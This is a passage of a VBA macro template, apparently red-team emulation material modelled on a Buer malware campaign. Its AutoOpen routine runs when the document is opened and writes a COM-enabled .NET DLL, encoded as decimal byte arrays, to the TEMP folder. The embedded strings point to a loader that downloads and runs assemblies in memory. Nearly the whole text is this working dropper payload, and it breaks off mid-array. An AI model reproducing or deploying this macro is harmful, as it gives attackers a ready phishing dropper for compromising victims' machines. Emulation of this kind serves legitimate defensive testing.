' This template needs to be split up into two modules as mentioned in the README
' https://jfmaes-1.gitbook.io/emulate-like-a-champ-emulating-the-latest-buer-cam/lab-3-detailed-invoice
' https://blog.nviso.eu/2021/04/27/i-solemnly-swear-i-am-up-to-no-good-introducing-the-marauders-map/

' First Module - COM enabled DLL Dropper:

Sub AutoOpen()
    DropIt
    Call test
End Sub

Private Sub DropIt()
    Dim dropbin As String
    CreateObject("WScript.Shell").currentdirectory = Environ("TEMP")
    ' binary blobs generated via a modified https://github.com/DidierStevens/DidierStevensSuite/blob/master/shellcode2vbscript.py version
    ' The binary is a compiled slightly modified version of @jfmaes Maraudersmap project - https://github.com/NVISOsecurity/blogposts/tree/master/MaraudersMap
	' Only x64 in this case
	dropbin = binary()  
    Path = Environ("TEMP")
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFSO.CreateTextFile(Path & "\ComDLL.dll", True)
    objFile.Write dropbin
    objFile.Close
End Sub

Private Function ParseBytes(strBytes) As String
    Dim aNumbers
    Dim dropbin As String
    Dim iIter

    dropbin = ""
    aNumbers = Split(strBytes)
    For iIter = LBound(aNumbers) To UBound(aNumbers)
        dropbin = dropbin + Chr(aNumbers(iIter))
    Next

    ParseBytes = dropbin
End Function

Private Function binary1() As String
    Dim dropbin As String

    dropbin = ""
    dropbin = dropbin + ParseBytes("77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205")
    dropbin = dropbin + ParseBytes("33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111")
    dropbin = dropbin + ParseBytes("116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10")
    dropbin = dropbin + ParseBytes("36 0 0 0 0 0 0 0 80 69 0 0 100 134 4 0 164 88 113 97 0 0 0 0 0 0 0 0 240 0 34 32 11")
    dropbin = dropbin + ParseBytes("2 11 0 0 30 0 0 0 8 0 0 0 0 0 0 238 61 0 0 0 32 0 0 0 0 64 0 0 0 0 0 0 32 0 0 0 2")
    dropbin = dropbin + ParseBytes("0 0 4 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 160 0 0 0 4 0 0 0 0 0 0 3 0 64 133 0 0 64 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 64 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 32 0 0 0 0 0 0 0 0 0 0 16 0 0 0 8 64 0")
    dropbin = dropbin + ParseBytes("0 40 0 0 0 144 61 0 0 91 0 0 0 0 96 0 0 152 3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 128 0 0 12 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 16 0 0 0 0 0 0 0 0 0 0 0 16 32 0 0 72 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 250 29 0 0 0 32 0 0 0 30 0 0 0 4 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 115 100 97 116 97 0 0 104 0 0 0 0 64 0 0 0 2 0")
    dropbin = dropbin + ParseBytes("0 0 34 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 192 46 114 115 114 99 0 0 0 152 3 0 0 0")
    dropbin = dropbin + ParseBytes("96 0 0 0 4 0 0 0 36 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 101 108 111 99 0")
    dropbin = dropbin + ParseBytes("0 12 0 0 0 0 128 0 0 0 2 0 0 0 40 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 66 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 208 61 0 0 0 0 0 0 0 0 0 0 0 0 0 0 72 0 0 0 2 0 5")
    dropbin = dropbin + ParseBytes("0 84 37 0 0 32 24 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 132 61 0 0 8 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 26 40 11 0")
    dropbin = dropbin + ParseBytes("0 6 42 66 2 45 6 114 92 5 0 112 42 2 111 40 0 0 10 42 19 48 3 0 90 0 0 0 1 0 0 17")
    dropbin = dropbin + ParseBytes("40 41 0 0 10 111 42 0 0 10 10 22 11 43 67 6 7 154 12 8 111 43 0 0 10 13 9 111 44 0")
    dropbin = dropbin + ParseBytes("0 10 2 111 44 0 0 10 25 40 45 0 0 10 44 32 9 111 46 0 0 10 40 2 0 0 6 2 111 46 0 0")
    dropbin = dropbin + ParseBytes("10 40 2 0 0 6 25 40 45 0 0 10 44 2 8 42 7 23 88 11 7 6 142 105 50 183 20 42 0 0 19")
    dropbin = dropbin + ParseBytes("48 4 0 38 0 0 0 2 0 0 17 32 0 64 1 0 141 42 0 0 1 10 43 9 3 6 22 7 111 47 0 0 10 2")
    dropbin = dropbin + ParseBytes("6 22 6 142 105 111 48 0 0 10 37 11 45 232 42 0 0 27 48 2 0 92 0 0 0 3 0 0 17 40 49")
    dropbin = dropbin + ParseBytes("0 0 10 10 2 114 94 5 0 112 111 50 0 0 10 44 62 6 2 111 51 0 0 10 11 7 22 115 52 0")
    dropbin = dropbin + ParseBytes("0 10 12 115 53 0 0 10 13 8 9 40 4 0 0 6 9 22 106 111 54 0 0 10 9 19 4 222 28 8 44")
    dropbin = dropbin + ParseBytes("6 8 111 55 0 0 10 220 7 44 6 7 111 55 0 0 10 220 6 2 111 51 0 0 10 42 17 4 42 1 28")
    dropbin = dropbin + ParseBytes("0 0 2 0 35 0 26 61 0 10 0 0 0 0 2 0 27 0 44 71 0 10 0 0 0 0 19 48 3 0 20 0 0 0 4 0")
    dropbin = dropbin + ParseBytes("0 17 2 3 18 0 111 56 0 0 10 44 7 6 40 5 0 0 6 42 20 42 19 48 4 0 27 0 0 0 5 0 0 17")
    dropbin = dropbin + ParseBytes("2 111 57 0 0 10 212 141 42 0 0 1 10 2 6 22 6 142 105 111 48 0 0 10 38 6 42 0 27 48")
    dropbin = dropbin + ParseBytes("3 0 151 0 0 0 6 0 0 17 4 111 44 0 0 10 111 58 0 0 10 10 4 111 46 0 0 10 44 41 4 111")
    dropbin = dropbin + ParseBytes("46 0 0 10 111 40 0 0 10 40 59 0 0 10 45 23 4 111 46 0 0 10 111 40 0 0 10 114 118 5")
    dropbin = dropbin + ParseBytes("0 112 6 40 60 0 0 10 10 2 6 40 6 0 0 6 12 8 45 4 20 13 222 73 8 40 7 0 0 6 11 222")
    dropbin = dropbin + ParseBytes("10 8 44 6 8 111 55 0 0 10 220 3 6 40 6 0 0 6 19 4 17 4 44 20 17 4 40 7 0 0 6 19 5")
    dropbin = dropbin + ParseBytes("7 17 5 40 61 0 0 10 13 222 21 222 12 17 4 44 7 17 4 111 55 0 0 10 220 7 40 33 0 0")
    dropbin = dropbin + ParseBytes("10 42 9 42 0 1 28 0 0 2 0 69 0 16 85 0 10 0 0 0 0 2 0 104 0 26 130 0 12 0 0 0 0 27")
    dropbin = dropbin + ParseBytes("48 3 0 181 0 0 0 7 0 0 17 126 1 0 0 4 12 22 13 8 18 3 40 62 0 0 10 126 2 0 0 4 3 111")
    dropbin = dropbin + ParseBytes("63 0 0 10 111 64 0 0 10 44 8 20 19 4 221 136 0 0 0 222 10 9 44 6 8 40 65 0 0 10 220")
    dropbin = dropbin + ParseBytes("3 111 63 0 0 10 115 66 0 0 10 10 6 40 3 0 0 6 11 7 20 40 67 0 0 10 44 2 7 42 126 3")
    dropbin = dropbin + ParseBytes("0 0 4 126 4 0 0 4 6 40 8 0 0 6 11 7 20 40 68 0 0 10 44 66 126 1 0 0 4 12 22 13 8 18")
    dropbin = dropbin + ParseBytes("3 40 62 0 0 10 126 2 0 0 4 3 111 63 0 0 10 23 111 69 0 0 10 222 10 9 44 6 8 40 65")
    dropbin = dropbin + ParseBytes("0 0 10 220 6 111 70 0 0 10 32 0 1 0 0 95 44 7 6 40 71 0 0 10 11 7 42 17 4 42 0 0 0")
    dropbin = dropbin + ParseBytes("1 28 0 0 2 0 8 0 36 44 0 10 0 0 0 0 2 0 118 0 27 145 0 10 0 0 0 0 166 115 32 0 0 10")
    dropbin = dropbin + ParseBytes("128 1 0 0 4 115 72 0 0 10 128 2 0 0 4 115 73 0 0 10 128 3 0 0 4 115 73 0 0 10 128")
    dropbin = dropbin + ParseBytes("4 0 0 4 42 154 127 5 0 0 4 23 40 74 0 0 10 23 51 1 42 40 41 0 0 10 20 254 6 9 0 0")
    dropbin = dropbin + ParseBytes("6 115 75 0 0 10 111 76 0 0 10 42 0 0 0 19 48 2 0 14 0 0 0 4 0 0 17 114 1 0 0 112 10")
    dropbin = dropbin + ParseBytes("2 6 40 15 0 0 10 42 46 114 56 5 0 112 115 16 0 0 10 122 46 114 56 5 0 112 115 16 0")
    dropbin = dropbin + ParseBytes("0 10 122 0 0 27 48 5 0 160 0 0 0 8 0 0 17 32 0 12 0 0 40 17 0 0 10 115 18 0 0 10 3")
    dropbin = dropbin + ParseBytes("111 19 0 0 10 10 5 23 141 24 0 0 1 37 22 31 32 157 111 20 0 0 10 19 4 17 4 11 32 16")
    dropbin = dropbin + ParseBytes("39 0 0 115 21 0 0 10 12 8 115 22 0 0 10 37 40 23 0 0 10 14 4 44 5 40 13 0 0 6 14 5")
    dropbin = dropbin + ParseBytes("44 5 40 14 0 0 6 6 7 40 17 0 0 6 38 111 24 0 0 10 40 25 0 0 10 8 111 26 0 0 10 111")
    dropbin = dropbin + ParseBytes("27 0 0 10 13 8 111 28 0 0 10 4 9 111 29 0 0 10 40 30 0 0 10 222 24 19 5 4 17 5 111")
    dropbin = dropbin + ParseBytes("31 0 0 10 40 30 0 0 10 222 7 4 40 12 0 0 6 220 42 1 28 0 0 0 0 0 0 135 135 0 17 20")
    dropbin = dropbin + ParseBytes("0 0 1 2 0 0 0 152 152 0 7 0 0 0 0 30 2 40 32 0 0 10 42 27 48 6 0 77 0 0 0 9 0 0 17")
    dropbin = dropbin + ParseBytes("2 40 33 0 0 10 10 20 11 6 111 34 0 0 10 20 23 141 14 0 0 1 37 22 3 162 111 35 0 0")
    dropbin = dropbin + ParseBytes("10 11 222 41 38 6 111 34 0 0 10 12 8 20 40 36 0 0 10 44 22 6 8 111 37 0 0 10 111 38")
    dropbin = dropbin + ParseBytes("0 0 10 13 8 9 20 111 35 0 0 10 11 222 0 7 42 0 0 0 1 16 0 0 0 0 9 0 25 34 0 41 14")
    dropbin = dropbin + ParseBytes("0 0 1 30 2 40 32 0 0 10 42 26 115 16 0 0 6 42 0 66 83 74 66 1 0 1 0 0 0 0 0 12 0 0")
    dropbin = dropbin + ParseBytes("0 118 52 46 48 46 51 48 51 49 57 0 0 0 0 5 0 108 0 0 0 44 6 0 0 35 126 0 0 152 6 0")
    dropbin = dropbin + ParseBytes("0 184 8 0 0 35 83 116 114 105 110 103 115 0 0 0 0 80 15 0 0 124 5 0 0 35 85 83 0 204")
    dropbin = dropbin + ParseBytes("20 0 0 16 0 0 0 35 71 85 73 68 0 0 0 220 20 0 0 68 3 0 0 35 66 108 111 98 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 2 0 0 1 87 61 2 8 9 0 0 0 0 250 37 51 0 22 0 0 1 0 0 0 50 0 0 0 6 0 0 0 7 0")
    dropbin = dropbin + ParseBytes("0 0 19 0 0 0 22 0 0 0 76 0 0 0 4 0 0 0 16 0 0 0 1 0 0 0 9 0 0 0 2 0 0 0 1 0 0 0 2")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 27 6 1 0 0 0 0 0 6 0 42 0 10 0 6 0 80 0 10 0 6 0 128 0 110 0 6 0 151 0 110")
    dropbin = dropbin + ParseBytes("0 6 0 180 0 110 0 6 0 211 0 110 0 6 0 236 0 110 0 6 0 5 1 110 0 6 0 32 1 110 0 6 0")
    dropbin = dropbin + ParseBytes("90 1 59 1 6 0 110 1 59 1 6 0 124 1 110 0 6 0 179 1 153 1 6 0 211 1 204 1 6 0 218 1")
    dropbin = dropbin + ParseBytes("59 1 6 0 242 1 59 1 6 0 15 2 5 2 6 0 34 2 204 1 6 0 58 2 5 2 6 0 71 2 204 1 10 0 92")
    dropbin = dropbin + ParseBytes("2 81 2 10 0 112 2 81 2 10 0 154 2 81 2 6 0 177 2 204 1 6 0 182 2 204 1 6 0 195 2 5")
    dropbin = dropbin + ParseBytes("2 6 0 208 2 5 2 6 0 215 2 204 1 6 0 223 2 5 2 6 0 3 3 247 2 6 0 76 3 10 0 6 0 92 3")
    dropbin = dropbin + ParseBytes("110 0 6 0 101 3 110 0 6 0 132 3 110 0 6 0 164 3 110 0 6 0 199 3 10 0 6 0 253 3 226")
    dropbin = dropbin + ParseBytes("3 6 0 31 4 10 4 6 0 43 4 110 0 6 0 56 4 204 1 6 0 106 4 204 1 6 0 146 4 204 1 10 0")
    dropbin = dropbin + ParseBytes("184 4 162 4 10 0 254 4 162 4 6 0 27 5 204 1 6 0 108 5 204 1 6 0 142 5 125 5 6 0 194")
    dropbin = dropbin + ParseBytes("5 110 0 6 0 222 5 125 5 6 0 243 5 204 1 0 0 0 0 1 0 0 0 0 0 1 0 1 0 128 1 16 0 53")
    dropbin = dropbin + ParseBytes("6 68 6 57 0 1 0 2 0 1 0 16 0 76 6 76 6 57 0 6 0 12 0 0 0 16 0 89 6 76 6 57 0 6 0 17")
    dropbin = dropbin + ParseBytes("0 128 1 16 0 97 6 76 6 57 0 6 0 19 0 0 0 0 0 114 6 0 0 57 0 6 0 20 0 17 0 150 6 99")
    dropbin = dropbin + ParseBytes("1 17 0 164 6 102 1 17 0 174 6 111 1 17 0 188 6 111 1 17 0 200 6 120 1 83 128 171 8")
    dropbin = dropbin + ParseBytes("229 1 83 128 68 6 229 1 96 32 0 0 0 0 145 24 143 6 95 1 1 0 103 32 0 0 0 0 145 0 211")
    dropbin = dropbin + ParseBytes("6 123 1 1 0 120 32 0 0 0 0 145 0 235 6 37 1 2 0 224 32 0 0 0 0 145 0 5 7 130 1 3 0")
    dropbin = dropbin + ParseBytes("20 33 0 0 0 0 145 0 31 7 138 1 5 0 152 33 0 0 0 0 145 0 31 7 144 1 6 0 184 33 0 0")
    dropbin = dropbin + ParseBytes("0 0 145 0 65 7 157 1 8 0 224 33 0 0 0 0 145 0 83 7 164 1 9 0 160 34 0 0 0 0 150 0")
    dropbin = dropbin + ParseBytes("131 7 187 1 12 0 128 35 0 0 0 0 145 24 143 6 95 1 14 0 170 35 0 0 0 0 150 0 156 7")
    dropbin = dropbin + ParseBytes("95 1 14 0 212 35 0 0 0 0 150 0 163 7 197 1 14 0 238 35 0 0 0 0 145 0 184 7 95 1 15")
    dropbin = dropbin + ParseBytes("0 250 35 0 0 0 0 145 0 206 7 95 1 15 0 8 36 0 0 0 0 134 0 4 8 202 1 15 0 208 36 0")
    dropbin = dropbin + ParseBytes("0 0 0 134 24 74 0 6 0 20 0 216 36 0 0 0 0 150 0 103 8 213 1 20 0 68 37 0 0 0 0 134")
    dropbin = dropbin + ParseBytes("24 74 0 6 0 22 0 76 37 0 0 0 0 145 0 143 8 221 1 22 0 0 0 1 0 227 6 0 0 1 0 0 7 0")
    dropbin = dropbin + ParseBytes("0 1 0 12 7 0 0 2 0 19 7 0 0 1 0 42 7 0 0 1 0 51 7 0 0 2 0 0 7 0 0 1 0 76 7 0 0 1 0")
    dropbin = dropbin + ParseBytes("174 6 0 0 2 0 188 6 0 0 3 0 109 7 0 0 1 0 147 7 0 0 2 0 154 7 0 0 1 0 175 7 0 0 1")
    dropbin = dropbin + ParseBytes("0 21 8 0 0 2 0 25 8 0 0 3 0 33 8 16 16 4 0 43 8 16 16 5 0 57 8 0 0 1 0 130 8 0 0 2")

    binary1 = dropbin
End Function

Private Function binary2() As String
    Dim dropbin As String

    dropbin = ""
    dropbin = dropbin + ParseBytes("0 134 8 0 32 0 0 0 0 9 0 74 0 1 0 17 0 74 0 6 0 25 0 74 0 10 0 33 0 74 0 10 0 41 0")
    dropbin = dropbin + ParseBytes("74 0 10 0 49 0 74 0 10 0 57 0 74 0 10 0 65 0 74 0 10 0 73 0 74 0 10 0 81 0 74 0 15")
    dropbin = dropbin + ParseBytes("0 89 0 74 0 10 0 97 0 74 0 10 0 105 0 74 0 10 0 121 0 74 0 20 0 137 0 20 2 26 0 145")
    dropbin = dropbin + ParseBytes("0 74 0 10 0 169 0 133 2 32 0 185 0 74 0 6 0 185 0 164 2 38 0 201 0 189 2 44 0 153")
    dropbin = dropbin + ParseBytes("0 74 0 1 0 209 0 74 0 51 0 225 0 234 2 57 0 233 0 241 2 6 0 241 0 12 3 63 0 153 0")
    dropbin = dropbin + ParseBytes("24 3 68 0 241 0 32 3 73 0 217 0 241 2 6 0 113 0 42 3 79 0 137 0 51 3 26 0 161 0 64")
    dropbin = dropbin + ParseBytes("3 79 0 113 0 74 0 6 0 1 1 112 3 83 0 1 1 117 3 91 0 17 1 143 3 97 0 9 1 150 3 104")
    dropbin = dropbin + ParseBytes("0 25 1 175 3 79 0 1 1 184 3 114 0 33 1 74 0 6 0 49 1 175 3 79 0 65 1 66 4 119 0 65")
    dropbin = dropbin + ParseBytes("1 84 4 125 0 1 1 98 4 132 0 57 1 175 3 79 0 201 0 123 4 138 0 57 1 130 4 147 0 217")
    dropbin = dropbin + ParseBytes("0 151 4 153 0 217 0 157 4 161 0 1 1 198 4 169 0 201 0 219 4 175 0 1 1 228 4 180 0")
    dropbin = dropbin + ParseBytes("89 1 74 0 186 0 153 0 74 0 6 0 217 0 14 5 195 0 105 1 39 5 6 0 12 0 47 5 208 0 217")
    dropbin = dropbin + ParseBytes("0 59 5 217 0 201 0 70 5 79 0 201 0 87 5 221 0 201 0 101 5 226 0 1 1 112 3 233 0 121")
    dropbin = dropbin + ParseBytes("1 150 5 243 0 113 1 175 3 79 0 20 0 156 5 2 1 121 1 168 5 8 1 57 1 74 0 10 0 1 1 150")
    dropbin = dropbin + ParseBytes("3 13 1 1 1 173 5 13 1 20 0 185 5 23 1 57 1 212 5 31 1 1 1 112 3 37 1 20 0 74 0 6 0")
    dropbin = dropbin + ParseBytes("12 0 74 0 6 0 137 1 234 5 46 1 145 1 74 0 53 1 65 1 7 6 59 1 14 0 24 0 232 1 14 0")
    dropbin = dropbin + ParseBytes("28 0 247 1 2 0 73 0 211 1 2 0 77 0 211 1 46 0 43 0 64 2 46 0 51 0 64 2 46 0 99 0 136")
    dropbin = dropbin + ParseBytes("2 46 0 11 0 6 2 46 0 19 0 15 2 46 0 27 0 46 2 46 0 35 0 64 2 46 0 107 0 149 2 46 0")
    dropbin = dropbin + ParseBytes("59 0 46 2 46 0 67 0 70 2 46 0 75 0 64 2 46 0 83 0 64 2 46 0 91 0 94 2 67 0 59 1 75")
    dropbin = dropbin + ParseBytes("1 99 0 115 0 86 1 99 0 83 0 80 1 45 0 227 1 223 2 237 2 243 2 2 3 6 3 11 3 26 3 40")
    dropbin = dropbin + ParseBytes("3 54 3 200 0 250 0 4 128 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 76 6 0 0 4 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 66 1 44 6 0 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 66 1 204 1 0 0 0 0 0 0 0 60 77 111")
    dropbin = dropbin + ParseBytes("100 117 108 101 62 0 83 121 115 116 101 109 46 82 117 110 116 105 109 101 46 67 111")
    dropbin = dropbin + ParseBytes("109 112 105 108 101 114 83 101 114 118 105 99 101 115 0 67 111 109 112 105 108 97")
    dropbin = dropbin + ParseBytes("116 105 111 110 82 101 108 97 120 97 116 105 111 110 115 65 116 116 114 105 98 117")
    dropbin = dropbin + ParseBytes("116 101 0 46 99 116 111 114 0 82 117 110 116 105 109 101 67 111 109 112 97 116 105")
    dropbin = dropbin + ParseBytes("98 105 108 105 116 121 65 116 116 114 105 98 117 116 101 0 83 121 115 116 101 109")
    dropbin = dropbin + ParseBytes("46 82 101 102 108 101 99 116 105 111 110 0 65 115 115 101 109 98 108 121 84 105 116")
    dropbin = dropbin + ParseBytes("108 101 65 116 116 114 105 98 117 116 101 0 65 115 115 101 109 98 108 121 68 101 115")
    dropbin = dropbin + ParseBytes("99 114 105 112 116 105 111 110 65 116 116 114 105 98 117 116 101 0 65 115 115 101")
    dropbin = dropbin + ParseBytes("109 98 108 121 67 111 110 102 105 103 117 114 97 116 105 111 110 65 116 116 114 105")
    dropbin = dropbin + ParseBytes("98 117 116 101 0 65 115 115 101 109 98 108 121 67 111 109 112 97 110 121 65 116 116")
    dropbin = dropbin + ParseBytes("114 105 98 117 116 101 0 65 115 115 101 109 98 108 121 80 114 111 100 117 99 116 65")
    dropbin = dropbin + ParseBytes("116 116 114 105 98 117 116 101 0 65 115 115 101 109 98 108 121 67 111 112 121 114")
    dropbin = dropbin + ParseBytes("105 103 104 116 65 116 116 114 105 98 117 116 101 0 65 115 115 101 109 98 108 121")
    dropbin = dropbin + ParseBytes("84 114 97 100 101 109 97 114 107 65 116 116 114 105 98 117 116 101 0 83 121 115 116")
    dropbin = dropbin + ParseBytes("101 109 46 82 117 110 116 105 109 101 46 73 110 116 101 114 111 112 83 101 114 118")
    dropbin = dropbin + ParseBytes("105 99 101 115 0 67 111 109 86 105 115 105 98 108 101 65 116 116 114 105 98 117 116")
    dropbin = dropbin + ParseBytes("101 0 71 117 105 100 65 116 116 114 105 98 117 116 101 0 65 115 115 101 109 98 108")
    dropbin = dropbin + ParseBytes("121 70 105 108 101 86 101 114 115 105 111 110 65 116 116 114 105 98 117 116 101 0")
    dropbin = dropbin + ParseBytes("83 121 115 116 101 109 46 82 117 110 116 105 109 101 46 86 101 114 115 105 111 110")
    dropbin = dropbin + ParseBytes("105 110 103 0 84 97 114 103 101 116 70 114 97 109 101 119 111 114 107 65 116 116 114")
    dropbin = dropbin + ParseBytes("105 98 117 116 101 0 83 121 115 116 101 109 0 79 98 106 101 99 116 0 67 108 97 115")
    dropbin = dropbin + ParseBytes("115 73 110 116 101 114 102 97 99 101 65 116 116 114 105 98 117 116 101 0 67 108 97")
    dropbin = dropbin + ParseBytes("115 115 73 110 116 101 114 102 97 99 101 84 121 112 101 0 83 121 115 116 101 109 46")
    dropbin = dropbin + ParseBytes("73 79 0 70 105 108 101 0 65 112 112 101 110 100 65 108 108 84 101 120 116 0 78 111")
    dropbin = dropbin + ParseBytes("116 73 109 112 108 101 109 101 110 116 101 100 69 120 99 101 112 116 105 111 110 0")
    dropbin = dropbin + ParseBytes("77 101 109 111 114 121 83 116 114 101 97 109 0 69 120 99 101 112 116 105 111 110 0")
    dropbin = dropbin + ParseBytes("83 121 115 116 101 109 46 78 101 116 0 83 101 114 118 105 99 101 80 111 105 110 116")
    dropbin = dropbin + ParseBytes("77 97 110 97 103 101 114 0 83 101 99 117 114 105 116 121 80 114 111 116 111 99 111")
    dropbin = dropbin + ParseBytes("108 84 121 112 101 0 115 101 116 95 83 101 99 117 114 105 116 121 80 114 111 116 111")
    dropbin = dropbin + ParseBytes("99 111 108 0 87 101 98 67 108 105 101 110 116 0 68 111 119 110 108 111 97 100 68 97")
    dropbin = dropbin + ParseBytes("116 97 0 67 104 97 114 0 83 116 114 105 110 103 0 83 112 108 105 116 0 83 116 114")
    dropbin = dropbin + ParseBytes("101 97 109 87 114 105 116 101 114 0 83 116 114 101 97 109 0 67 111 110 115 111 108")
    dropbin = dropbin + ParseBytes("101 0 84 101 120 116 87 114 105 116 101 114 0 83 101 116 79 117 116 0 67 108 111 115")
    dropbin = dropbin + ParseBytes("101 0 83 121 115 116 101 109 46 84 101 120 116 0 69 110 99 111 100 105 110 103 0 103")
    dropbin = dropbin + ParseBytes("101 116 95 68 101 102 97 117 108 116 0 84 111 65 114 114 97 121 0 71 101 116 83 116")
    dropbin = dropbin + ParseBytes("114 105 110 103 0 84 111 83 116 114 105 110 103 0 87 114 105 116 101 65 108 108 84")
    dropbin = dropbin + ParseBytes("101 120 116 0 103 101 116 95 77 101 115 115 97 103 101 0 67 97 108 108 67 111 110")
    dropbin = dropbin + ParseBytes("118 83 116 100 99 97 108 108 0 65 115 115 101 109 98 108 121 0 77 101 116 104 111")
    dropbin = dropbin + ParseBytes("100 73 110 102 111 0 76 111 97 100 0 103 101 116 95 69 110 116 114 121 80 111 105")
    dropbin = dropbin + ParseBytes("110 116 0 77 101 116 104 111 100 66 97 115 101 0 73 110 118 111 107 101 0 111 112")
    dropbin = dropbin + ParseBytes("95 73 110 101 113 117 97 108 105 116 121 0 77 101 109 98 101 114 73 110 102 111 0")
    dropbin = dropbin + ParseBytes("103 101 116 95 78 97 109 101 0 67 114 101 97 116 101 73 110 115 116 97 110 99 101")
    dropbin = dropbin + ParseBytes("0 67 111 109 112 105 108 101 114 71 101 110 101 114 97 116 101 100 65 116 116 114")
    dropbin = dropbin + ParseBytes("105 98 117 116 101 0 83 121 115 116 101 109 46 67 111 108 108 101 99 116 105 111 110")
    dropbin = dropbin + ParseBytes("115 46 71 101 110 101 114 105 99 0 68 105 99 116 105 111 110 97 114 121 96 50 0 83")
    dropbin = dropbin + ParseBytes("121 115 116 101 109 46 71 108 111 98 97 108 105 122 97 116 105 111 110 0 67 117 108")
    dropbin = dropbin + ParseBytes("116 117 114 101 73 110 102 111 0 65 115 115 101 109 98 108 121 78 97 109 101 0 65")
    dropbin = dropbin + ParseBytes("112 112 68 111 109 97 105 110 0 103 101 116 95 67 117 114 114 101 110 116 68 111 109")
    dropbin = dropbin + ParseBytes("97 105 110 0 71 101 116 65 115 115 101 109 98 108 105 101 115 0 71 101 116 78 97 109")
    dropbin = dropbin + ParseBytes("101 0 83 116 114 105 110 103 67 111 109 112 97 114 105 115 111 110 0 69 113 117 97")
    dropbin = dropbin + ParseBytes("108 115 0 103 101 116 95 67 117 108 116 117 114 101 73 110 102 111 0 66 121 116 101")
    dropbin = dropbin + ParseBytes("0 87 114 105 116 101 0 82 101 97 100 0 83 121 115 116 101 109 46 73 79 46 67 111 109")
    dropbin = dropbin + ParseBytes("112 114 101 115 115 105 111 110 0 68 101 102 108 97 116 101 83 116 114 101 97 109")
    dropbin = dropbin + ParseBytes("0 71 101 116 69 120 101 99 117 116 105 110 103 65 115 115 101 109 98 108 121 0 69")
    dropbin = dropbin + ParseBytes("110 100 115 87 105 116 104 0 71 101 116 77 97 110 105 102 101 115 116 82 101 115 111")
    dropbin = dropbin + ParseBytes("117 114 99 101 83 116 114 101 97 109 0 67 111 109 112 114 101 115 115 105 111 110")
    dropbin = dropbin + ParseBytes("77 111 100 101 0 115 101 116 95 80 111 115 105 116 105 111 110 0 73 68 105 115 112")
    dropbin = dropbin + ParseBytes("111 115 97 98 108 101 0 68 105 115 112 111 115 101 0 84 114 121 71 101 116 86 97 108")
    dropbin = dropbin + ParseBytes("117 101 0 103 101 116 95 76 101 110 103 116 104 0 84 111 76 111 119 101 114 73 110")
